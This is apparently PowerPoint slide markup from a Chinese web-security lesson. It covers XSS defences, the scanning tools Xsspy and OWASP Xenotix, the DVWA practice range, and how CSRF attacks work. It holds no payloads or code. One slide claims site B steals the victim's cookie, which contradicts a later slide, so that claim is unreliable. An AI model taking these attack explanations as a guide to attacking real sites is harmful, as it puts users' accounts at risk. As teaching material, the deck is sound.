          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将重要的cookies标记为http only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，这样JavaScript中的document.cookie语句就不能获取到cookie了；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>只允许用户输入我们期望的数据，如年龄的textbox中只允许输入数字，其余</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对数据进行Html Encode处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，如&lt;转化为&amp;lt；、&amp;转化为&amp;amp；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>过滤或移除特殊的Html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>标签，如：script、iframe；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>过滤JavaScript事件的标签</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，如“onclick=”、“onfocus”等等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>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6258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XSS</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注入攻击防范</a:t>
              </a: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18385" y="1290320"/>
            <a:ext cx="9257030" cy="4523105"/>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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Xsspy (python)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>主要针对XSS漏洞的漏洞扫描器，Xsspy不仅仅检查一个页面，它可以便利网站，以及子域名。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP Xenotix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>OWASP 是一个高效的跨站脚本漏洞（XSS）检测和攻击测试框架。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是一款基于PHP和mysql开发的web靶场练习平台，集成了常见的web漏洞如sql注入，密码破解等常见漏洞。</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4076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XSS</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注入攻击学习工具</a:t>
              </a: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85160" y="2564130"/>
            <a:ext cx="6889750" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1"/>
              <a:t>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78BD22E-1515-D91C-2394-F4600A7731F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2730403" y="-128030"/>
            <a:ext cx="7093220" cy="6467045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233062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1010" y="1053465"/>
            <a:ext cx="9762490" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>一.CSRF是什么？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>　　CSRF（Cross-site request forgery），中文名称：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>，也被称为：one click attack/session riding，缩写为：CSRF/XSRF。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>二.CSRF可以做什么？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>　　可以这么理解CSRF攻击：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击者盗用了你的身份，以你的名义发送恶意请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>。CSRF能够做的事情包括：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以你名义发送邮件，发消息，盗取你的账号，甚至于购买商品，虚拟货币转账</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>......造成的问题包括：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个人隐私泄露以及财产安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1927656" y="-96238"/>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825055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 （cross-site request forgery）跨站请求伪造</a:t>
              </a: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26005" y="1205230"/>
            <a:ext cx="9079865" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>三.CSRF发生的原因是什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         web的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>隐式身份验证机制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，WEB的身份验证机制虽然可以保证一个请求是来自于某个用户的浏览器，但却</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>无法保证该请求是用户批准发送的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>四.CSRF的危害</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>1、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>篡改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>目标网站上的用户数据； </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>盗取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>用户隐私数据； </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>3、作为其他攻击向量的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>辅助攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>手法； </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>4、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>传播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> CSRF 蠕虫。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1927656" y="-96238"/>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825055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 （cross-site request forgery）跨站请求伪造</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7A45D8-3EE3-920A-47CE-0C727811A590}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744980" y="940551"/>
            <a:ext cx="3581400" cy="1866900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3172125A-9455-C43A-BF0B-181811522419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3089249" y="940551"/>
            <a:ext cx="9102751" cy="5628498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A4C2B5C-3537-4588-ABD9-9D81977B221B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072640" y="60753"/>
            <a:ext cx="6096000" cy="502445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2665" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2665" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表单（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2665" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2665" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C8F746E-07AF-B5B3-A05F-5E8403BEDFA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1927656" y="24918"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="圆角矩形 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62C7EF6F-EFBE-2F00-BB8B-61FC270E895C}"/>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 name="矩形 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23B7E3BF-47FD-CB9D-F356-46F0B14AAA99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="3255956"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表单（</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POST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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398030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3781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 攻击示意图</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1952625" y="5659120"/>
            <a:ext cx="8287385" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>要完成一次CSRF攻击，受害者必须依次完成两个步骤：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>　　1.登录受信任网站A，并在本地生成Cookie。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>　　2.在不登出A的情况下，访问危险网站B。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1770380" y="598170"/>
            <a:ext cx="6581775" cy="5105400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597900" y="3879215"/>
            <a:ext cx="3591560" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>做了两件事：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>隐藏一个链接，跳转到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，包含用户请求；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>窃取用户登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>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63750" y="965200"/>
            <a:ext cx="9461500" cy="3928110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>➢攻击一般发起在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第三方网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，而不是被攻击的网站。被攻击的网站无法防止攻击发生。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>➢攻击利用受害者在被攻击网站的登录凭证，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>冒充受害者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>提交操作；而不是直接窃取数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>➢整个过程攻击者并不能获取到受害者的登录凭证，仅仅是“</a:t>
            </a:r>
